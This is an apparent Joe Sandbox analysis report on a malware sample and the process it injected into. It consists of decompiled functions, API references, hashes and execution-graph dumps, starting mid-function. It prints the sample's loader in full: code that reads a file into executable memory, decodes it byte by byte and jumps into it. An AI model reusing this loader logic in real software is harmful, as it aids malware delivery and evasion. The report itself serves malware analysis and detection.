                                  					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                  					_t32 = _t14;
                                  					if(_t14 == 0) {
                                  						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004092A0(_t32, 1, 8, _t14) & 0x000000ff) - 0x40);
                                  					}
                                  					return _t14;
                                  				}
                                  				return _t13;
                                  			}













                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                  • Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
                                  • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                  • Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 295 418a43-418a6f call 4191e0 298 418a72-418a84 LookupPrivilegeValueW 295->298
                                  C-Code - Quality: 64%
                                  			E00418A43(void* __eax, void* __edi, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a20) {
                                  				int _t12;
                                  				struct _LUID* _t15;
                                  
                                  				_pop(ds);
                                  				asm("adc byte [ebx-0x74aaa23b], 0xec");
                                  				_t9 = _a8;
                                  				E004191E0(__edi, _a8,  &(_a8[0x646]),  *((intOrPtr*)(_t9 + 0xa18)), 0, 0x46);
                                  				_t15 = _a20;
                                  				_t12 = LookupPrivilegeValueW(_a8, _a12, _t15); // executed
                                  				return _t12;
                                  			}






                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: ae9698e84e4323be442f2f83e1ab73c2a960153ea6fc5f13f69c76e17f809523
                                  • Instruction ID: 60c75eee51255491854019ad401f11de2f602a18f1be5bf679ff97c2b48e5772
                                  • Opcode Fuzzy Hash: ae9698e84e4323be442f2f83e1ab73c2a960153ea6fc5f13f69c76e17f809523
                                  • Instruction Fuzzy Hash: 12E02B713002046BCB10DF54CC84FDB3758AF85260F044254F9485B681C634D901C7F4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 299 4188f0-418906 300 41890c-418921 RtlFreeHeap 299->300 301 418907 call 4191e0 299->301 301->300
                                  C-Code - Quality: 100%
                                  			E004188F0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                  				char _t10;
                                  				void* _t15;
                                  
                                  				_t3 = _a4 + 0xc74; // 0xc74
                                  				E004191E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                  				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                  				return _t10;
                                  			}






                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                  • Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                  • Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 302 418a50-418a69 303 418a6f-418a84 LookupPrivilegeValueW 302->303 304 418a6a call 4191e0 302->304 304->303
                                  C-Code - Quality: 100%
                                  			E00418A50(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                  				int _t10;
                                  				struct _LUID* _t13;
                                  				void* _t15;
                                  
                                  				E004191E0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                  				_t13 = _a16;
                                  				_t10 = LookupPrivilegeValueW(_a8, _a12, _t13); // executed
                                  				return _t10;
                                  			}







                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                  • Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                  • Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E004188EC(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                  				char _t10;
                                  				void* _t15;
                                  
                                  				asm("lds edi, [eax+edx*2-0x1374aa2a]");
                                  				_t7 = _a4;
                                  				_t3 = _t7 + 0xc74; // 0xc74
                                  				E004191E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                  				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                  				return _t10;
                                  			}





                                  0x004188ec
                                  0x004188f3
                                  0x004188ff
                                  0x00418907
                                  0x0041891d
                                  0x00418921

                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: a376fa8f1b0c5b5529367328cf9c80c2e006efa77a539a1e6123e7ce98e9ecc5
                                  • Instruction ID: a58c7be9f91f7ac1209e609bae96ae711d935c9085237017060422d5dceac348
                                  • Opcode Fuzzy Hash: a376fa8f1b0c5b5529367328cf9c80c2e006efa77a539a1e6123e7ce98e9ecc5
                                  • Instruction Fuzzy Hash: F0E01AB6200215AFE718DF55CC48EE737A9EF88350F114599F9096B252C631E914CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E00418927() {
                                  				int _v0;
                                  				intOrPtr _v4;
                                  				void* _t15;
                                  
                                  				asm("popfd");
                                  				_t8 = _v4;
                                  				E004191E0(_t15, _v4, _v4 + 0xc7c,  *((intOrPtr*)(_t8 + 0xa14)), 0, 0x36);
                                  				ExitProcess(_v0);
                                  			}






                                  0x0041892a
                                  0x00418933
                                  0x0041894a
                                  0x00418958

                                  APIs
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: 46291d7874e08f1f6064e0bae517bf70260e854c2b51cdc6473dca481346551d
                                  • Instruction ID: 4b88871481af6a000613f8035513a02a0bd105e18e87cbf091c97fafb534024b
                                  • Opcode Fuzzy Hash: 46291d7874e08f1f6064e0bae517bf70260e854c2b51cdc6473dca481346551d
                                  • Instruction Fuzzy Hash: 61E08C70600100BFD724DF29CC89FC33B6CDF49350F0181A8B9189B282C932AA00CAA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00418930(intOrPtr _a4, int _a8) {
                                  				void* _t10;
                                  
                                  				_t5 = _a4;
                                  				E004191E0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                  				ExitProcess(_a8);
                                  			}




                                  0x00418933
                                  0x0041894a
                                  0x00418958

                                  APIs
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                  • Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                  • Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00418A85(void* __eax, struct _LUID* __edx, void* __edi, void* __esi) {
                                  				int _t7;
                                  				void* _t16;
                                  
                                  				_pop(_t16);
                                  				_t7 = LookupPrivilegeValueW( *(_t16 + 0xc),  *(_t16 + 0x10), __edx); // executed
                                  				return _t7;
                                  			}





                                  0x00418a85
                                  0x00418a80
                                  0x00418a84

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 1e001322639cc478076f0aeba9eb7c1c59b9d126d59ec3677524c20280ebe012
                                  • Instruction ID: 111d42dededef8c2c475a282c70f370bfecbec6ce36c6d9aaf438b929fea2fef
                                  • Opcode Fuzzy Hash: 1e001322639cc478076f0aeba9eb7c1c59b9d126d59ec3677524c20280ebe012
                                  • Instruction Fuzzy Hash: E5C012B1240104AB8601EE589C808AA73A9EFC4258B24841AF81A83252E632D8219AA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4280bebae3123cef7d52a02990505cc8a441ad6c0aca62ae3e0a814a98d1fd1e
                                  • Instruction ID: 340182fecc54c97667ff35601095d1472c1583bb915c872a72c12ad79e302ae3
                                  • Opcode Fuzzy Hash: 4280bebae3123cef7d52a02990505cc8a441ad6c0aca62ae3e0a814a98d1fd1e
                                  • Instruction Fuzzy Hash: 31B09B719114C5C9DA11D7B4460C717794077D0745F57C067D3020641B4778C0D1FAB5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 16%
                                  			E00406AB4(void* __esi) {
                                  
                                  				asm("adc eax, 0xf0f42a51");
                                  				asm("sbb dword [ecx-0x57], 0xffffffe5");
                                  				return 1;
                                  			}



                                  0x00406abb
                                  0x00406ac0
                                  0x00406ad4

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9c7aef8ca8326889e45b8c8dd2c4991aad73f2905a35ad3fa535b2dacc91cdb4
                                  • Instruction ID: c0bd1993aa229e4ce6cd3c7c1ffad2efdeffbe971b7b6ceec182d4ce7fb829b6
                                  • Opcode Fuzzy Hash: 9c7aef8ca8326889e45b8c8dd2c4991aad73f2905a35ad3fa535b2dacc91cdb4
                                  • Instruction Fuzzy Hash: 27C0123295160106D1248A18EC44270F364F743128F047367DC54EB1608243C042028C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  • Instruction Fuzzy Hash: 0090027121504C42D14071A94404B464015A7D0345F52C025A1054694DD6658D55B7A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fe03e367e7265ef1cd70ab33f09428f14592e5fb17989bb0f51684932d808977
                                  • Instruction ID: 7f8ee52ee4de3bbd731e1a22ef429111b8ceb8997954a5378e9afa0ccf9ca255
                                  • Opcode Fuzzy Hash: fe03e367e7265ef1cd70ab33f09428f14592e5fb17989bb0f51684932d808977
                                  • Instruction Fuzzy Hash: 4890027121100C42D10061A94404B464005A7E0341F52C02AA1114654DC655C8517661
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction ID: 79f87be1fcfa7dc3af87157c48090f20674f1f44aea0764501ff5203f8f8f4a1
                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction Fuzzy Hash:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			_entry_() {
                                  				int _v16;
                                  				struct _OVERLAPPED* _v20;
                                  				long _v28;
                                  				void* _t48;
                                  				long _t49;
                                  				void* _t50;
                                  				void* _t51;
                                  				long _t77;
                                  				void** _t78;
                                  
                                  				_v20 = 0;
                                  				_t48 = CreateFileW((CommandLineToArgvW(GetCommandLineW(),  &_v16))[1], 0x80000000, 1, 0, 3, 0x80, 0);
                                  				if(_t48 != 0xffffffff) {
                                  					_t49 = GetFileSize(_t48, 0);
                                  					_t77 = _t49;
                                  					_t50 = VirtualAlloc(0, _t49, 0x3000, 0x40);
                                  					 *_t78 = _t50;
                                  					_t4 = _t77 - 1; // -1
                                  					_t48 = ReadFile(_t48, _t50, _t4,  &_v28, 0);
                                  					if(_t48 != 0) {
                                  						if(_t77 == 0) {
                                  							L5:
                                  							_t48 =  *_t78;
                                  							goto __eax;
                                  						}
                                  						_t51 = 0;
                                  						do {
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xb2;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 1;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) - 1;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0x69;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xee;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 1;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xb5;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0x50;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 1;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xa2;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) ^ 0x000000b8;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0x88;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xa1;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) - 1;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0x13;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xcc;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) - 1;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0x40;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xd8;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) ^ 0x00000006;
                                  							_t51 = _t51 + 1;
                                  						} while (_t77 != _t51);
                                  						goto L5;
                                  					}
                                  				}
                                  				return _t48;
                                  			}

                                  APIs
                                  • GetCommandLineW.KERNEL32 ref: 009C100C
                                  • CommandLineToArgvW.SHELL32(00000000,?), ref: 009C1018
                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 009C1031
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 009C1044
                                  • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 009C1055
                                  • ReadFile.KERNEL32(00000000,00000000,-00000001,?,00000000), ref: 009C106A
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335307274.00000000009C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009C0000, based on PE: true
                                  • Associated: 00000004.00000002.335289873.00000000009C0000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000004.00000002.335321067.00000000009C2000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_9c0000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: File$CommandLine$AllocArgvCreateReadSizeVirtual
                                  • String ID:
                                  • API String ID: 4005432831-0
                                  • Opcode ID: e2e8c65b62e20bc440d5b6d00bad9f5e5b00ee7004caba8489a4a99600fe35d7
                                  • Instruction ID: f9d0860f3cc0db14978248b594a98d6a2eba75d40f9ec466966746852efbc90d
                                  • Opcode Fuzzy Hash: e2e8c65b62e20bc440d5b6d00bad9f5e5b00ee7004caba8489a4a99600fe35d7
                                  • Instruction Fuzzy Hash: 6A31453060C2819FD326EB24CCA4E39BBA9EF97714F15468CE1D25B6D2C7665C03D722
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 53%
                                  			E0133FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                  				void* _t7;
                                  				intOrPtr _t9;
                                  				intOrPtr _t10;
                                  				intOrPtr* _t12;
                                  				intOrPtr* _t13;
                                  				intOrPtr _t14;
                                  				intOrPtr* _t15;
                                  
                                  				_t13 = __edx;
                                  				_push(_a4);
                                  				_t14 =  *[fs:0x18];
                                  				_t15 = _t12;
                                  				_t7 = E012ECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                  				_push(_t13);
                                  				E01335720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                  				_t9 =  *_t15;
                                  				if(_t9 == 0xffffffff) {
                                  					_t10 = 0;
                                  				} else {
                                  					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                  				}
                                  				_push(_t10);
                                  				_push(_t15);
                                  				_push( *((intOrPtr*)(_t15 + 0xc)));
                                  				_push( *((intOrPtr*)(_t14 + 0x24)));
                                  				return E01335720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                  			}

                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0133FDFA
                                  Strings
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0133FE2B
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0133FE01
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                  • API String ID: 885266447-3903918235
                                  • Opcode ID: d08ec3da876baa9f52e368045a9c7e03eb6694b46ce6c58f15efa684193b57e0
                                  • Instruction ID: d42c3966f6f310c0788041f205be8a92b920eea350870680d383e100f2f3fead
                                  • Opcode Fuzzy Hash: d08ec3da876baa9f52e368045a9c7e03eb6694b46ce6c58f15efa684193b57e0
                                  • Instruction Fuzzy Hash: DFF0C232640201BBEA211A89DC06F23BB5AEB84B30F140214F628565E1EA62E82086B5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:4.9%
                                  Dynamic/Decrypted Code Coverage:2%
                                  Signature Coverage:0%
                                  Total number of Nodes:697
                                  Total number of Limit Nodes:88
33064->33063 33065 42b3af 33065->33055 33067 438a90 33065->33067 33068 438aaf 33067->33068 33069 4391e0 LdrLoadDll 33067->33069 33068->33059 33069->33068 33070->33065 33113 42bdb0 33071->33113 33073 42ccd7 33074 42ccf0 33073->33074 33126 423d70 33073->33126 33076 43a270 2 API calls 33074->33076 33078 42ccfe 33076->33078 33077 42ccea 33150 437430 33077->33150 33078->32950 33081 42863b 33080->33081 33082 42d080 3 API calls 33081->33082 33088 42875b 33081->33088 33083 42873c 33082->33083 33084 42876a 33083->33084 33085 428751 33083->33085 33086 438710 2 API calls 33083->33086 33084->32954 33183 425ea0 LdrLoadDll 33085->33183 33086->33085 33088->32954 33090 4391e0 LdrLoadDll 33089->33090 33091 42acb0 33089->33091 33090->33091 33091->32961 33091->32962 33091->32998 33093 42d3d0 2 API calls 33092->33093 33094 4375e2 33092->33094 33093->33094 33094->32980 33096 427298 33095->33096 33097 429b40 LdrLoadDll 33096->33097 33098 4272b3 33097->33098 33099 433e50 LdrLoadDll 33098->33099 33100 4272c3 33099->33100 33101 4272fd 33100->33101 33102 4272cc PostThreadMessageW 33100->33102 33101->32879 33102->33101 33103 4272e0 33102->33103 33104 4272ea PostThreadMessageW 33103->33104 33104->33101 33105->32965 33106->32974 33107->32978 33108->32982 33109->32985 33110->32990 33111->32987 33112->32991 33114 42bde3 33113->33114 33155 42a150 33114->33155 33116 42bdf5 33159 42a2c0 33116->33159 33118 42be13 33119 42a2c0 LdrLoadDll 33118->33119 33120 42be29 33119->33120 33121 42d200 3 API calls 33120->33121 33122 42be4d 33121->33122 33123 42be54 33122->33123 33162 43a2b0 LdrLoadDll RtlAllocateHeap 33122->33162 33123->33073 33125 42be64 33125->33073 33127 423d7b 33126->33127 33128 42b340 3 API calls 33127->33128 33130 423e61 33128->33130 33129 423e68 33129->33077 33130->33129 33163 43a2f0 33130->33163 33132 423ec9 33133 429e90 LdrLoadDll 33132->33133 33134 423fd3 33133->33134 33135 429e90 LdrLoadDll 33134->33135 33136 423ff7 33135->33136 33167 42b400 33136->33167 33140 424083 33141 43a020 2 API 
calls 33140->33141 33142 424110 33141->33142 33143 43a020 2 API calls 33142->33143 33145 42412a 33143->33145 33144 4242a6 33144->33077 33145->33144 33146 429e90 LdrLoadDll 33145->33146 33147 42416a 33146->33147 33148 429d60 LdrLoadDll 33147->33148 33149 42420a 33148->33149 33149->33077 33151 433e50 LdrLoadDll 33150->33151 33153 437451 33150->33153 33151->33153 33152 437477 33152->33074 33153->33152 33154 437464 CreateThread 33153->33154 33154->33074 33156 42a177 33155->33156 33157 429e90 LdrLoadDll 33156->33157 33158 42a1b3 33157->33158 33158->33116 33160 429e90 LdrLoadDll 33159->33160 33161 42a2d9 33160->33161 33161->33118 33162->33125 33164 43a2fd 33163->33164 33165 433e50 LdrLoadDll 33164->33165 33166 43a310 33165->33166 33166->33132 33168 42b425 33167->33168 33176 438310 33168->33176 33171 4383a0 33172 4391e0 LdrLoadDll 33171->33172 33173 4383bc 33172->33173 33182 2c99650 LdrInitializeThunk 33173->33182 33174 4383db 33174->33140 33177 4391e0 LdrLoadDll 33176->33177 33178 43832c 33177->33178 33181 2c996d0 LdrInitializeThunk 33178->33181 33179 42405c 33179->33140 33179->33171 33181->33179 33182->33174 33183->33088 33185 4391e0 LdrLoadDll 33184->33185 33186 43812c 33185->33186 33189 2c99840 LdrInitializeThunk 33186->33189 33187 42d40e 33187->32879 33189->33187

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 350 4385e0-438631 call 4391e0 NtCreateFile
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,00433BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00433BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0043862D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: .z`
                                  • API String ID: 823142352-1441809116
                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction ID: fcb1043aaa514eec64f5c4699e0dd10690412c13ace7cb01d42e5637fa4172b6
                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction Fuzzy Hash: AFF0B2B2204208ABCB08CF89DC85EEB77ADAF8C754F158248FA0D97241C630E811CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 353 43868a-43868c 354 4386d7-4386d9 353->354 355 43868f-4386d5 call 4391e0 NtReadFile 353->355 355->354
                                  APIs
                                  • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:C,FFFFFFFF,?,r=C,?,00000000), ref: 004386D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: 1:C
                                  • API String ID: 2738559852-278173926
                                  • Opcode ID: 16c69349b1816a208540ef2aec8ec27e67fd62ea77375001735d694e4455079c
                                  • Instruction ID: 4c5f9648aae18d49e43a884f142673fe2543afb45c1523fc8facbe621884117a
                                  • Opcode Fuzzy Hash: 16c69349b1816a208540ef2aec8ec27e67fd62ea77375001735d694e4455079c
                                  • Instruction Fuzzy Hash: 44F0F4B6200108AFCB14DF99DC85EEB77A9EF8C354F118249FE0DA7241CA34E911CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 358 438690-4386a6 359 4386ac-4386d9 NtReadFile 358->359 360 4386a7 call 4391e0 358->360 360->359
                                  APIs
                                  • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:C,FFFFFFFF,?,r=C,?,00000000), ref: 004386D5
